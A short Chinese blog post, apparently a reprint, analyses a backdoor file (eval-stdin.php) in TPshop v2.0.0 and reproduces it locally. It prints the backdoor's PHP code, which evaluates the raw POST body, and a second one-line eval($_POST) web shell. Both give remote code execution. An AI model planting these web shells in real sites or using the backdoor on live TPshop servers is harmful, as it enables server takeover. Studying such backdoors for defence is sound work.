TPshop商城 Getshell后门文件分析与复现
本文作者:i春秋签约作家——Laimooc官网地址:http://www.tp-shop.cn/ 影响版本:TPSHOP v2.0.0 后门文件:eval-stdin.php 内容:
<?php eval('?>' . file_get_contents('php://input')); ?>分析: 使用
file_get_contents('php://input'))接收POST请求的原始数据流 eval函数来执行。 我们把代码复制下来,本地调试如下,惊喜不,喜欢不,兴奋不:


<O>
<?php eval($_POST[c]);?>
</O>


关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 不负青春 不负韶华 7903987
- 2 济南一烤鸭店陪考停业告示火了 7808568
- 3 特朗普:我和马斯克的关系已经结束了 7712338
- 4 破万亿 以旧换新助推消费升级 7615887
- 5 五胞胎同时参加高考 50多万学费被免 7521001
- 6 韦东奕严选账号已改名 7424633
- 7 高考历史有“文言文” 7331958
- 8 Labubu捧出河南新首富 7232359
- 9 曝马斯克与美财长曾在白宫大打出手 7142280
- 10 赵丽颖染回黑发了 7047997